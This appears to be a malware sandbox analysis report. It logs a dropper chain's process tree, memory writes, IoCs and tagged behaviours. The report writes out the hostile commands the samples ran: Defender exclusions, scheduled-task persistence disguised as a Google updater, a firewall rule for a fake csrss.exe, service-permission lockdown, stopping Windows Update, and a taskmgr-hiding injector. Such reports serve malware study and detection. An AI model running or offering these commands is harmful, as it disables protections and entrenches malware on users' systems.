PID 4756 wrote to memory of 5044	4756	1bU20VP8.exe	73
PID 4756 wrote to memory of 5044	4756	1bU20VP8.exe	73
PID 4756 wrote to memory of 5044	4756	1bU20VP8.exe	73
PID 4756 wrote to memory of 5044	4756	1bU20VP8.exe	73
PID 4756 wrote to memory of 5044	4756	1bU20VP8.exe	73
PID 4756 wrote to memory of 5044	4756	1bU20VP8.exe	73
PID 4756 wrote to memory of 5044	4756	1bU20VP8.exe	73
PID 4288 wrote to memory of 4804	4288	oi8IN07.exe	74
PID 4288 wrote to memory of 4804	4288	oi8IN07.exe	74
PID 4288 wrote to memory of 4804	4288	oi8IN07.exe	74
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4804 wrote to memory of 4832	4804	2GN1592.exe	75
PID 4444 wrote to memory of 4440	4444	ch0Lw56.exe	76
PID 4444 wrote to memory of 4440	4444	ch0Lw56.exe	76
PID 4444 wrote to memory of 4440	4444	ch0Lw56.exe	76
PID 3396 wrote to memory of 2804	3396	Explorer.EXE	79
PID 3396 wrote to memory of 2804	3396	Explorer.EXE	79
PID 3396 wrote to memory of 2804	3396	Explorer.EXE	79
PID 3396 wrote to memory of 1544	3396	Explorer.EXE	81
PID 3396 wrote to memory of 1544	3396	Explorer.EXE	81
PID 3396 wrote to memory of 1544	3396	Explorer.EXE	81
PID 2804 wrote to memory of 800	2804	FA7D.exe	80
PID 2804 wrote to memory of 800	2804	FA7D.exe	80
PID 2804 wrote to memory of 800	2804	FA7D.exe	80
PID 800 wrote to memory of 4080	800	VI6ld7KF.exe	82
PID 800 wrote to memory of 4080	800	VI6ld7KF.exe	82
PID 800 wrote to memory of 4080	800	VI6ld7KF.exe	82
PID 3396 wrote to memory of 4628	3396	Explorer.EXE	83
PID 3396 wrote to memory of 4628	3396	Explorer.EXE	83
PID 4080 wrote to memory of 4344	4080	HU1sX8sI.exe	85
PID 4080 wrote to memory of 4344	4080	HU1sX8sI.exe	85
PID 4080 wrote to memory of 4344	4080	HU1sX8sI.exe	85
PID 3396 wrote to memory of 2252	3396	Explorer.EXE	86
PID 3396 wrote to memory of 2252	3396	Explorer.EXE	86
PID 3396 wrote to memory of 2252	3396	Explorer.EXE	86
PID 4344 wrote to memory of 224	4344	PE8hr3hE.exe	87
PID 4344 wrote to memory of 224	4344	PE8hr3hE.exe	87
PID 4344 wrote to memory of 224	4344	PE8hr3hE.exe	87
PID 224 wrote to memory of 1804	224	sq3Cv0TO.exe	88
PID 224 wrote to memory of 1804	224	sq3Cv0TO.exe	88
PID 224 wrote to memory of 1804	224	sq3Cv0TO.exe	88
PID 3396 wrote to memory of 164	3396	Explorer.EXE	89
PID 3396 wrote to memory of 164	3396	Explorer.EXE	89
PID 3396 wrote to memory of 164	3396	Explorer.EXE	89
PID 3396 wrote to memory of 4400	3396	Explorer.EXE	90
PID 3396 wrote to memory of 4400	3396	Explorer.EXE	90
PID 3396 wrote to memory of 4400	3396	Explorer.EXE	90
PID 4400 wrote to memory of 4520	4400	BC.exe	91
PID 4400 wrote to memory of 4520	4400	BC.exe	91

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2D8A.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2D8A.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396
- C:\Users\Admin\AppData\Local\Temp\ch0Lw56.exe
  "C:\Users\Admin\AppData\Local\Temp\ch0Lw56.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oi8IN07.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oi8IN07.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1bU20VP8.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1bU20VP8.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4756
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5044
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2GN1592.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2GN1592.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4804
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:4832
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 568
        6⤵
        Program crash
        
        PID:3280
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3by11ax.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3by11ax.exe
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:4440
- C:\Users\Admin\AppData\Local\Temp\FA7D.exe
  C:\Users\Admin\AppData\Local\Temp\FA7D.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VI6ld7KF.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VI6ld7KF.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:800
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HU1sX8sI.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HU1sX8sI.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4080
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\PE8hr3hE.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\PE8hr3hE.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4344
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\sq3Cv0TO.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\sq3Cv0TO.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:224
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ka11uG6.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ka11uG6.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1804
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:3556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3556 -s 568
        9⤵
        Program crash
        
        PID:940
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2lO462aT.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2lO462aT.exe
        7⤵
        Executes dropped EXE
        
        PID:236
- C:\Users\Admin\AppData\Local\Temp\FB78.exe
  C:\Users\Admin\AppData\Local\Temp\FB78.exe
  2⤵
  - Executes dropped EXE
  PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FCC1.bat" "
  2⤵
  - Checks computer location settings
  PID:4628
- C:\Users\Admin\AppData\Local\Temp\FD8D.exe
  C:\Users\Admin\AppData\Local\Temp\FD8D.exe
  2⤵
  - Executes dropped EXE
  PID:2252
- C:\Users\Admin\AppData\Local\Temp\FE88.exe
  C:\Users\Admin\AppData\Local\Temp\FE88.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of AdjustPrivilegeToken
  PID:164
- C:\Users\Admin\AppData\Local\Temp\BC.exe
  C:\Users\Admin\AppData\Local\Temp\BC.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
    "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
    3⤵
    - Executes dropped EXE
    PID:4520
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:4152
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
      4⤵
      PID:760
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        5⤵
        
        PID:3812
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:4764
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        5⤵
        
        PID:4708
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:3872
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        5⤵
        
        PID:368
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        5⤵
        
        PID:4540
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      Loads dropped DLL
      PID:5920
- C:\Users\Admin\AppData\Local\Temp\466.exe
  C:\Users\Admin\AppData\Local\Temp\466.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1416
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 756
    3⤵
    - Program crash
    PID:4856
- C:\Users\Admin\AppData\Local\Temp\353B.exe
  C:\Users\Admin\AppData\Local\Temp\353B.exe
  2⤵
  - Executes dropped EXE
  PID:5972
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5416
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:6100
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:5772
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:928
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:5876
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4288
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:1156
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:6180
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1364
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:2556
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2516
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Creates scheduled task(s)
        
        PID:6292
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:5228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2044
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6824
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6408
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        
        PID:1124
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:6632
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:6516
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:6436
      - C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        6⤵
        Executes dropped EXE
        
        PID:4052
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn "csrss" /f
        7⤵
        
        PID:6456
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn "ScheduledUpdate" /f
        7⤵
        
        PID:3536
- - C:\Users\Admin\AppData\Local\Temp\kos4.exe
    "C:\Users\Admin\AppData\Local\Temp\kos4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6052
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      Executes dropped EXE
      PID:6012
    - - C:\Users\Admin\AppData\Local\Temp\is-M4N57.tmp\LzmwAqmV.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M4N57.tmp\LzmwAqmV.tmp" /SL5="$104F6,2778800,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5944
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:5364
- C:\Users\Admin\AppData\Local\Temp\3711.exe
  C:\Users\Admin\AppData\Local\Temp\3711.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:6060
- C:\Users\Admin\AppData\Local\Temp\51BE.exe
  C:\Users\Admin\AppData\Local\Temp\51BE.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:5816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6728
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 580
      4⤵
      Program crash
      PID:6968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5328
- C:\Users\Admin\AppData\Local\Temp\2720.exe
  C:\Users\Admin\AppData\Local\Temp\2720.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4420
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:1100
- C:\Users\Admin\AppData\Local\Temp\2D8A.exe
  C:\Users\Admin\AppData\Local\Temp\2D8A.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - outlook_office_path
  - outlook_win_path
  PID:6320
- C:\Users\Admin\AppData\Local\Temp\2FDC.exe
  C:\Users\Admin\AppData\Local\Temp\2FDC.exe
  2⤵
  - Executes dropped EXE
  PID:6912
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6652
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4540
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2044
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5388
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:6156
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:6064
- C:\Users\Admin\AppData\Local\Temp\32DB.exe
  C:\Users\Admin\AppData\Local\Temp\32DB.exe
  2⤵
  PID:6292
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2816
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:7048
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:2508
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5388
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:6796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:4440
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6936
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:6824
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1664
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:6692
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:7004
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5144
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Executes dropped EXE
    - Launches sc.exe
    PID:6876
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:6804
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:7044
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:6948
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5628
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:6200
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6988
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:3428
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:6508

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4840

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:764

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4732

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4892

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2084

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1040

